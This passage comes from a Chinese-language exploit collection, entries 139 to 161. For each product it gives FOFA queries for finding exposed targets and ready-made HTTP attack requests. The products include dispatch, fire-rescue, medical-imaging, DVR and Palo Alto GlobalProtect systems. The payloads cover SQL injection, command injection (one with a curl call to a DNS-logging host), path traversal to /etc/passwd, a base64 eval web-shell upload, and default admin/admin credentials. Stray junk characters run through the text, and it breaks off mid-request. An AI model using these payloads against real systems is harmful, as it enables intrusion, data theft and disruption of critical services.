- j2 n1 o3 D% k: `6 ~9 t: u+ U& `( F$ T" `0 z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
4 D- d1 p6 E" g [2 XCVE-2024-2622
$ u4 }; M7 A4 f: t$ z, Q$ L. ~( hFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' n' Y" ]" t3 u7 u* a4 ^8 ^GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1' R# E" A$ [; X$ U( R
Host: x.x.x.x
) z& L' x p9 V' y) qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& ]4 x, ]5 ~5 c' Z, JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" b0 E1 K$ P* b6 b, F0 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 p/ X/ v% R3 n5 wAccept-Encoding: gzip, deflate, br5 D; w N5 `! g. _, J- K2 W
Connection: close
" F+ T$ v' b( {! g" k+ h" OCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
% ?: Z% {7 j' \2 M* CUpgrade-Insecure-Requests: 1; t+ h' K+ x" _- b# w! Q2 F: d/ _
% f e) I4 U/ u" z0 N2 o
9 h" L0 u, u3 ^3 {3 \9 L140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' c: S2 {! U R/ x4 c) @- t% @( E
CVE-2024-2566% U) F9 R1 K3 B, g
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 \7 i; T8 C5 i& I1 n
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
# k/ n' d7 X) x( tHost: x.x.x.x
% J$ S3 c" }# K; Y0 i$ W3 k, ~9 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 y' P3 a3 G. Q6 L; W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 o" D5 c! N; \! j/ @5 a" l$ r/ N. JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 w8 M% T, g$ d$ T) A
Accept-Encoding: gzip, deflate, br
/ S1 F( c; K( _6 }# B3 IConnection: close
. A9 X9 {% T/ R# ECookie: authcode=h8g9
0 i+ k- j% q6 u; W9 N0 I7 h# aUpgrade-Insecure-Requests: 1+ N8 I2 C& b! V" ]2 X( Z! t3 n
3 `% Q: p7 S2 v+ n/ I$ R+ t" W) j3 n* g
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
! [/ \) x' g1 |) o7 _# oFOFA:body="指挥调度管理平台"
5 H6 S+ s" p5 S$ }* T, BPOST /app/ext/ajax_users.php HTTP/1.1
7 d$ |5 T @& t& w5 C/ dHost: your-ip2 b' g) `3 p# L* v. W$ m
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info& V' O% [ X) Y& [# y; J9 ]. S
Content-Type: application/x-www-form-urlencoded
, f% d# w" x: h5 V. S% z% ^) ]" i3 V9 n- e# H3 S7 ]
! J. b9 I ]6 `3 j* b- i2 F8 ]dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! F' X- b# w& K' [0 K0 s
9 L. j) Z8 K: M2 P9 S) \3 P8 m; n$ q/ j
142. CMSV6车辆监控平台系统中存在弱密码 U/ E: G/ o+ Z/ E2 l7 T
CVE-2024-29666
( s* |; A* Y7 A8 j- Q+ z& O4 D' BFOFA:body="/808gps/"
0 T1 u6 W, w: P& s4 ^9 ]$ zadmin/admin5 r. Z& G ~0 R; l$ T- T& E
143. Netis WF2780 v2.1.40144 远程命令执行! t- F, z' T/ p9 n: ?
CVE-2024-25850
7 P7 @ M+ M% VFOFA:title='AP setup' && header='netis'
1 F/ ]- d) J1 X; M K7 oPAYLOAD
$ q$ T. A1 J5 v/ x/ M
' ~' \, B* S+ o2 I& w144. D-Link nas_sharing.cgi 命令注入$ l5 Y% X9 i( g6 p( w5 n
FOFA:app="D_Link-DNS-ShareCenter"
0 `9 l. r, w# x% q1 v( Y, o% rsystem参数用于传要执行的命令
/ p. j1 R$ q% Z. N1 ?) eGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.18 f6 E. n; A q5 w
Host: x.x.x.x! k# M: m! K* {& D# M
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
) p E7 e' b! Y' s0 qConnection: close
) w4 C* V0 v( |( G$ @; U1 {8 |9 JAccept: */*& T& O' Z5 \3 g _8 ]( W' r
Accept-Language: en
$ f& I! U1 _6 p, o4 N7 cAccept-Encoding: gzip u1 ]8 j: L. V% z" q. H
& U j/ |$ c9 m! D. o; \% N6 D
5 n3 n5 U: s; H4 w' i145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; a& a, Z' |/ V7 ~: K
CVE-2024-3400& M3 O; o2 Y" l) a& P' c0 s% x
FOFA:icon_hash="-631559155"2 ~: g5 p& W7 Q* W1 A
GET /global-protect/login.esp HTTP/1.18 h$ k- L) t1 e! S4 }- N& b
Host: 192.168.30.112:1005
2 f( R9 U9 ?2 }9 ]) L! CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84/ C, s& \3 [! Z4 A$ d; S
Connection: close& J- {5 a$ T5 G, _: I+ a
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;8 S* {+ f6 ~9 X& ^9 J. j2 {# I
Accept-Encoding: gzip2 M' ~9 I' t7 C% S) k
/ R+ O+ V; z6 z/ l; x4 b6 i
P% x- U# `3 y" i
146. MajorDoMo thumb.php 未授权远程代码执行6 _- g+ P) e; G
CNVD-2024-02175
- l2 b: \( t7 I3 m" B- S/ }# mFOFA:app="MajordomoSL"
& i s, C1 }, G- q. ^/ Z `GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1' B- B* v+ y$ H0 H
Host: x.x.x.x
. E' {7 u; u) @/ s2 x. IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.844 V& Q; x* [7 x0 \* D1 o
Accept-Charset: utf-80 D7 M' s( K, K) C
Accept-Encoding: gzip, deflate5 b( K1 H8 h8 _3 h5 a6 ]+ x8 Z
Connection: close5 ?7 f0 Y# }+ ~
/ K/ B8 ^0 j5 m+ R3 T5 G# t+ N0 a8 R. P, o. b/ G- Q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% O( o' j8 Q0 \" v! ?
CVE-2024-323991 ?, R G7 }' e) L8 J! P
FOFA:body="RaidenMAILD"8 C, U4 E: \: X8 D: Q, L
GET /webeditor/../../../windows/win.ini HTTP/1.1
3 p% | E( b; {: J) K$ hHost: 127.0.0.1:81
a4 {. U3 n l/ l6 K. ~$ zCache-Control: max-age=0) g3 J W6 T6 G8 U/ x! n
Connection: close5 h+ |+ m) k7 z
W9 S* X2 P- @3 r# M; D+ P0 D! E$ ]7 E+ h h
148. CrushFTP 认证绕过模板注入
! I" ^7 U9 @% u0 w* q ]! F6 p3 \CVE-2024-4040
, [4 G, X# ? X% Q/ M' o3 [FOFA:body="CrushFTP"
9 ?7 D% r8 }/ [# SPAYLOAD! J) L$ K4 y3 C8 k
2 r8 P9 G8 ^% z* g2 ]% t149. AJ-Report开源数据大屏存在远程命令执行. p- @6 H4 h7 f6 L4 b- o9 w) a
FOFA:title="AJ-Report": Q) S% C* F# M I
7 S2 d$ D, K% W) IPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
. k' C) Z9 `$ m: w g, U; xHost: x.x.x.x
0 v4 ~$ ~3 f2 V0 l$ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 [+ ?' S: _. w4 a" m( A! X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
E* k' [& m/ S% SAccept-Encoding: gzip, deflate, br* C, M' T- y/ a0 H
Accept-Language: zh-CN,zh;q=0.9, C" j: Z" D% @( m6 U, r
Content-Type: application/json;charset=UTF-85 E2 U) _! X3 `3 f5 C6 I
Connection: close
: m9 f: e% Q2 }- d7 P3 @9 T- h, d5 j _/ `" T7 h
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 x- Z& W" P$ y- R" Z: d; V, s
; ]: B* b) ]' ~
150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ ?) }5 D s6 _2 b# LFOFA:title="AJ-Report"
. L p% E: B0 vPOST /dataSetParam/verification;swagger-ui/ HTTP/1.18 P% U. E3 k" F I n
Host: x.x.x.x
( X: X- n! s, G# b$ ]" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' T }+ ^/ ?. c8 |1 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 Y# p; f% k. q: V/ GAccept-Encoding: gzip, deflate, br0 t8 G. d: A' h3 p5 k
Accept-Language: zh-CN,zh;q=0.9/ L% l, I0 e" l Q
Content-Type: application/json;charset=UTF-82 u j9 z3 e" ?
Connection: close7 r2 K! w" M: Q0 L
Content-Length: 339
* B. n. }, P6 [' q9 R+ R& M v& Y6 g% \2 w6 J6 U, l# `
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}% q% j4 {0 S6 H5 w; {* n7 x' M( D
! A# }& y2 T/ d Y9 B1 }
8 V: P. A4 {6 N151. AJ-Report 1.4.1 pageList sql注入) u& P3 ^' r; A0 z1 x' o9 \# \0 x f
FOFA:title="AJ-Report"
& E& q* |6 I: ]: V2 C2 {GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1: ]2 W7 c% f# t+ g
Host: x.x.x.x
3 Q. P3 Y8 z6 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 a0 L9 ~1 D! d* n6 K7 l& W' V
Connection: close
) M Q# d* u; f6 sAccept-Encoding: gzip
) x1 N+ a" Q% Q: w8 z4 M7 n D+ E- J5 `* H; S5 l
3 s, l2 T2 M$ n- G152. Progress Kemp LoadMaster 远程命令执行- x: @5 P8 R; V- A9 S1 a, r
CVE-2024-1212
2 t" X) i0 O' h$ e; bLoadMaster <= 7.2.59.2 (GA)1 Q% X0 u' s6 b% @
LoadMaster<=7.2.54.8 (LTSF)
6 F( w. g8 }1 n& NLoadMaster <= 7.2.48.10 (LTS)
8 t6 w7 W9 ^7 |3 }" SFOFA:body="LoadMaster"
& g, q6 Q1 E- U3 RJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
: Z2 o4 ?7 V/ `2 U2 V: vGET /access/set?param=enableapi&value=1 HTTP/1.13 O/ K1 Y2 F- a( i! ?
Host: x.x.x.x, c1 E" }8 u6 {& T+ Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
$ d* f8 g, s) {/ u9 G1 A" h1 cConnection: close9 K. X( X# K1 R* W4 F5 X
Accept: */*
5 H O& J) {4 {Accept-Language: en
: p2 P) j0 U5 K! g0 K7 B# s& E( lAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
- {: c: G8 Y( n, }( ~Accept-Encoding: gzip6 C6 q! y/ K5 B' l( ]* X
, }' c7 T6 m W/ Z) ^. k2 g- G; C+ Q, E |. g+ M) y
153. gradio任意文件读取
/ b% D) B* L$ w7 g0 @CVE-2024-1561FOFA:body="__gradio_mode__"" M& B/ Y" V+ B: t. Z) {! z1 b% B: h
第一步,请求/config文件获取componets的id: C$ [& W. d/ U9 _# ^' ]3 J
http://x.x.x.x/config: z5 o- |9 F7 i. k# f7 s; k0 b X
/ y, C$ ]% z2 I6 k( a7 K
) c) p% X* s4 Q. Y3 R. j5 h* {第二步,将/etc/passwd的内容写入到一个临时文件" f5 I/ u) ^4 {# p6 B! j3 U0 g
POST /component_server HTTP/1.1
* r) q, X/ M& UHost: x.x.x.x
+ b( J( Y1 p* X* `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
; ?" Y0 S) M. f3 i4 Y, IConnection: close
@ E8 p0 j3 R: @Content-Length: 115
5 ^" E- K5 ?4 w# ~% n! z; jContent-Type: application/json
4 @( X4 R; P9 M3 ~Accept-Encoding: gzip' A# j3 Z$ i% W2 B+ D$ ^) E
2 s4 i1 E1 R- O1 X7 p! r E s{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}6 v# X1 P4 D0 D
5 w% X0 v0 X/ R( ^1 p5 ?* k; \6 @& Y+ Q; w0 {" E8 {% T$ w! @0 J
第三步访问
$ G- H' `- U$ \( Thttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
# `, L; I" b9 o$ P R
5 M6 ~& `3 K" [
$ [+ H$ R/ g. q/ u5 f' C154. 天维尔消防救援作战调度平台 SQL注入/ a' q2 T( V* x' i5 B) E
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"8 Z& q6 {5 ~% u* ?% G* Y* u7 i
POST /twms-service-mfs/mfsNotice/page HTTP/1.13 s \4 b: f' q9 {8 T* Y- [1 J
Host: x.x.x.x5 J2 W9 }: s+ P* s2 ^% z7 y1 H
Content-Length: 1065 O/ B- I0 H l* V' ?5 x
Cache-Control: max-age=0
/ r |1 v: }& p9 O# U8 n: aUpgrade-Insecure-Requests: 11 p8 _- j3 f$ c) {6 E
Origin: http://x.x.x.x# D- Q2 l0 h0 d* P7 o. m* g0 \
Content-Type: application/json
/ a7 s% K# Y0 j& U) |. H! T5 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) U1 F" R& C, c H1 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! x# ^9 H* w" f. g; ?
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
0 `- |& q6 Y! AAccept-Encoding: gzip, deflate D. O" X6 ]2 i% |
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.77 `; S, q& T3 V9 r0 ^( h" ]
Connection: close; K8 A4 P7 F: c& z5 t1 h; O
/ u' |+ r+ u0 J) J4 S1 Z4 {{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}- A7 ?; ]" q) j
8 o* P# f* S3 P6 N1 u" O, M
' \) o$ n3 ~3 i [5 a4 |8 s- E
155. 六零导航页 file.php 任意文件上传3 N; C2 g7 E. x& f/ c9 X% {' u8 q
CVE-2024-349828 T! j2 Y) H( O$ `# T0 F# h7 n! n
FOFA:title=="上网导航 - LyLme Spage": F+ z3 M; V8 H N
POST /include/file.php HTTP/1.1
7 y8 q- S2 d, h! I1 wHost: x.x.x.x" O& B! v1 |8 O6 W: e$ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
$ n* J, Z% E, P. ?0 o7 R5 D/ t UConnection: close& J' x6 o" M5 I& `7 Y# ?( m
Content-Length: 232* C2 o: a9 v z5 Q
Accept: application/json, text/javascript, */*; q=0.01
( D: `, n" t: U/ M7 k, ]. GAccept-Encoding: gzip, deflate, br
- G0 V0 i) q: l+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 s( ^; p) i8 f
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f1 _/ B9 P! o2 _: p
X-Requested-With: XMLHttpRequest# m, y: k8 ~) R& W
1 p u' E/ r; m1 i* e
-----------------------------qttl7vemrsold314zg0f+ z7 b9 `; ?/ b8 O; P4 z2 G
Content-Disposition: form-data; name="file"; filename="test.php"
! d, D Z$ }: U fContent-Type: image/png# O/ n. O1 r2 R [
; t+ w4 @9 d9 y" q<?php phpinfo();unlink(__FILE__);?>
, _# Y$ E0 i. k: ]/ U& k-----------------------------qttl7vemrsold314zg0f--
2 t8 W. O4 E; l% g4 X/ A) X- K$ s! e
$ j8 `3 t# ~6 k- k
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php" b9 q' B; K' h$ \
- N9 J/ i3 @) m! |: f3 T( W0 k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 N" v, W9 y1 m1 Y+ h! Q& r6 ?CVE-2024-3721
6 V1 s( ]- {7 P: Q! `* jFOFA:"Location: /login.rsp"
0 y* m9 M; X' J9 K·TBK DVR-4104
1 R z( R* c1 q, k·TBK DVR-4216* t- F ?" Q3 } _
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"0 \$ D! A r( w7 C: l. S7 g: |
! r" U; r% `' c3 r' b" G# J" a* @" h1 J0 O6 A/ J
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1' i1 s3 Y0 ^9 N# p9 J
Host: x.x.x.x
; a& E" l* Y5 z1 SUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# E; \# B* \7 A3 u$ gConnection: close
9 c/ _+ W1 G, V3 Q" }; nContent-Length: 0) Y9 o+ z% J4 s# R3 l3 j
Cookie: uid=1- B( d4 \$ ?- }8 X; A2 s) b9 }
Accept-Encoding: gzip2 _3 P1 L: ~! R8 w j9 E2 d5 }5 y
7 f7 J! S3 q. U) ~ j: {
! S" g a- h8 w$ G5 Q
157. 美特CRM upload.jsp 任意文件上传
. P: d( v( R# h/ h; ^CNVD-2023-06971
3 k0 E$ q* n$ N7 [: K% YFOFA:body="/common/scripts/basic.js"
* u6 ?5 t/ y9 [5 F& G7 }( Z, RPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
8 f5 n1 v; w: f% LHost: x.x.x.x$ n4 O5 I1 c M' C1 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ }0 q0 v3 M/ h! {4 |
Content-Length: 709; e: g$ X1 K: ], B0 M4 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 F, }2 s% _ C) qAccept-Encoding: gzip, deflate" b @3 j5 B& n$ _* M
Accept-Language: zh-CN,zh;q=0.9
0 c3 a$ a9 H9 H& \; g6 ~8 ?$ GCache-Control: max-age=09 b! I) i1 C7 B0 W+ k o( B N
Connection: close* J( ^6 p, q8 t5 q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN# u2 _' ]. U N. A( Q5 ~
Upgrade-Insecure-Requests: 1
& L8 }4 c4 ~# T& `( `0 f- y: V: y6 R+ D* |& l
------WebKitFormBoundary1imovELzPsfzp5dN8 V& L) _4 `- n
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp" Z' ~! u. h' D) P0 e; x
Content-Type: application/octet-stream+ O7 z" X' J3 }+ C
0 v/ I" X, Y1 G U1 W( n: q, [
nyhelxrutzwhrsvsrafb
2 `7 u& V7 c# f, C6 U7 G------WebKitFormBoundary1imovELzPsfzp5dN8 X' z9 P' u$ {8 N }0 M1 P
Content-Disposition: form-data; name="key"
1 t" m; E6 X2 K6 H. f& Y2 J7 b( Q! u0 l
null0 x) X& |/ D9 T" x0 ]
------WebKitFormBoundary1imovELzPsfzp5dN8 h1 ?9 b9 @' S8 `" E' S. { x
Content-Disposition: form-data; name="form": j- t# ]* I7 L j+ _" }: L
* u- j2 w. L9 G- x1 a# ^ `
null/ r4 h; l8 {, F. M' U) P& N
------WebKitFormBoundary1imovELzPsfzp5dN+ A) f5 e0 U' v& W: \9 K1 H
Content-Disposition: form-data; name="field" k. M2 r" v+ r5 c E3 A
# m- B& }6 i: {2 e: [9 i5 E% H
null
" G$ |3 }3 q# ~. O$ g0 e4 e5 y------WebKitFormBoundary1imovELzPsfzp5dN3 i9 A' G% F# q2 Z- M* b
Content-Disposition: form-data; name="filetitile"
; O% S9 @0 M" B: J f/ s; d* [* \" v% l
null: q+ M5 a5 X! a) A5 W0 W4 I! b
------WebKitFormBoundary1imovELzPsfzp5dN: O/ |+ L' w' B
Content-Disposition: form-data; name="filefolder"
" ~7 T2 g0 f4 V
% H. a; D$ ~" Jnull
9 o2 Q; F' d8 M------WebKitFormBoundary1imovELzPsfzp5dN--8 h; l" W0 v* u/ X) i( `" r2 Y
, a0 Z% H Z8 ^* y/ g8 @0 {2 B8 [% r" j) s4 [
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
' z* n% n% C; s
2 ?. E' s& V! l) A: Q( V158. Mura-CMS-processAsyncObject存在SQL注入" w. t$ W/ O$ \0 |
CVE-2024-32640
' I* u: V6 H; N, x% x$ a2 i6 {0 fFOFA:"Generator: Masa CMS"% J, t, |# o% ?6 m) K
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
; n. }/ ?4 R6 Y5 X% `0 V" yHost: {{Hostname}}! u2 q: u4 w4 w& @; }+ X
Content-Type: application/x-www-form-urlencoded5 C& U8 T) c5 [+ M5 O- f1 m
* a( R7 z B: v9 J+ M7 `5 \0 n; e2 robject=displayregion&contenthistid=x\'&previewid=11 o2 k3 Z5 I+ S6 \# S, d! c5 v
5 j. E2 h4 b) V, y* I9 t! ~% i# z X0 T8 ^
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
. I2 f# f. H9 [ G& CFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")5 w1 J% f2 Q# L$ F
POST /webservices/WebJobUpload.asmx HTTP/1.1
. G& e9 r( w) U uHost: x.x.x.x+ y/ f& z3 X6 H/ }2 a% v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
( b# s4 C- y* B ~0 w- `+ qContent-Length: 1080, D Z& r8 ~9 a
Accept-Encoding: gzip, deflate4 M+ Q7 w$ ^! N* X4 R8 E; |; p( h
Connection: close! M3 G3 [& O/ @
Content-Type: text/xml; charset=utf-8
8 a& J. ?6 K2 @$ M9 jSoapaction: "http://rainier/jobUpload"/ B3 | e8 E$ c2 G
7 I/ p/ S; f" w7 J2 Y4 t9 S3 s
<?xml version="1.0" encoding="utf-8"?>
6 H+ W: F3 D& r/ I4 I* y# n/ I<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 {- ]- {; \* |+ K/ `9 O$ ]! \
<soap:Body>
' R- F4 I; G! f$ C, S/ y6 C/ E<jobUpload xmlns="http://rainier">
) x1 |" [. v4 z" T4 ^<vcode>1</vcode>; D& F" O; ?# U- x% ?6 G- N
<subFolder></subFolder>
, u$ m( {" Q- Q- n<fileName>abcrce.asmx</fileName>) C" A0 c5 n. C% I
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
5 S3 F+ }! \' L6 u4 b2 C( ]2 c( {</jobUpload>+ _2 s; `' H4 u T$ g
</soap:Body>: a2 a3 l- `- l% D% n) I+ [
</soap:Envelope>
0 q0 o3 X+ ?/ i* B
% f( j) F4 R- M; h# |+ |* I% P
; s+ x* ?9 p5 T" b5 q/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")6 W) X4 N b3 s3 g- }' j% x
( a3 ~% }% x$ K6 P- n
7 }. o3 v$ f, @. H4 ^
160. Sonatype Nexus Repository 3目录遍历与文件读取; }, @7 m) e; E! h9 k
CVE-2024-49560 m0 W( E; L4 d7 @9 ~5 p+ u$ f
FOFA:title="Nexus Repository Manager") Y2 P" S" q1 }# n" Y n- l
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
% ~1 o @, D8 h$ qHost: x.x.x.x4 f+ i- W. w( F4 ^; M* ^( O
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0; ? [1 J! c* e
Connection: close
( o) z7 V1 A) E( x; p( ^Accept: */*; M J& t( B* ?& G- Q5 n
Accept-Language: en
, \0 ~% k: n7 j' x- vAccept-Encoding: gzip' `4 s( A/ ~. p6 J$ u7 Q9 }
- F$ M8 S! I8 q4 @( O: r
5 Z( g1 Q6 L- P! @+ E* l, h; S2 \4 S161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传" J0 |1 W/ n* d# M
FOFA:body="/KT_Css/qd_defaul.css" L1 u# T4 x( F" Y0 }' H
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密1 M( ~% @) P" v8 X
POST /Webservice.asmx HTTP/1.1% W% B* k% a/ o7 {& g
Host: x.x.x.x
5 M. I3 I7 J) |1 x" z2 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
$ t$ L5 e Y# h2 J' {Connection: close
5 i1 j$ k7 B3 {2 a) }' HContent-Length: 445 J8 T' l" }. R# m9 G. W- |
Content-Type: text/xml
( W( d% s9 F# T$ @7 A% `Accept-Encoding: gzip
" e* i8 V h; z- l/ P) g# a+ m* J! T8 k/ w- f) z
<?xml version="1.0" encoding="utf-8"?>$ l% z( H' l6 ?! z0 N9 A" D! P
<soap:Envelope xmlns:xsi="6 G& r7 U- y7 z: x5 b
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"1 k. v( d' I* m; x) X
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
